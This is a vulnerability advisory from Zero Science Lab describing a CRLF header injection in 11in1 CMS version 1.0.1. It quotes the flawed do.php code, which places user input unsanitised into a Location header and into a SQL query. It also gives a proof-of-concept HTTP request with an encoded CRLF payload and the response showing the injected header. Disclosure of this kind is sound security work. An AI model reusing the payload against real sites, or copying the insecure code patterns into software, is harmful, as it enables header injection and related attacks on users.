11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability Vendor: 11in1 Product web page: http://www.11in1.org Affected version: 1.0.1 Summary: Eleven in One is an open-source content management system (CMS) that is powered by PHP and MySQL. It does not only help you manage your personal blog but also maintain your postings at social networks. By establishing consistency among the data transmitted from and to the blog, this CMS sustains continuous harmonization of your data over time. Desc: Input passed to the 'content' parameter in 'do.php' on line 2112 is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user. ============================================================== /admin/do.php: -------------------------------------------------------------- 2088: // update status 2089: else if(($action == "postStatus")&&($_SERVER["REQUEST_METHOD"] == "POST")&&($_SESSION['admin'] == 1)) 2090: { 2091: $content = htmlspecialchars($_POST['content']); 2092: 2093: // Get database information 2094: $Database = new Database; 2095: $info = $Database->getInfo(); 2096: 2097: // connect to database 2098: $conn = mysql_connect($info[0], $info[1], $info[2]); 2099: mysql_select_db($info[3], $conn); 2100: 2101: $date = date("Y-m-d H:i:s"); 2102: 2103: // clear table 2104: $result = mysql_query("INSERT INTO 11in1_streamline (content, date) VALUES ('$content', '$date')"); 2105: 2106: // close connection to db 2107: mysql_close($conn); 2108: 2109: // prepare success message 2110: $_SESSION['msg'] = array("title" => $lang_backend_request_executed, "msg" => $lang_backend_statusPosted, "url" => "streamline.php", "button" => $lang_error_goBack); 2111: 2112: header("Location: msg.php?connect=yes&status=$content"); 2113: } ============================================================== Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.21 MySQL 5.5.16 PHP 5.3.8 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Zero Science Lab Advisory ID: ZSL-2011-5055 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php 06.11.2011 ------ POST /11in1/admin/do.php?action=postStatus HTTP/1.1 Content-Length: 47 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection -- HTTP/1.1 302 Found Date: Sun, 06 Nov 2011 18:53:29 GMT Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: msg.php?connect=yes&status= ZSL-Custom-Header: love_injection Content-Length: 1716 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html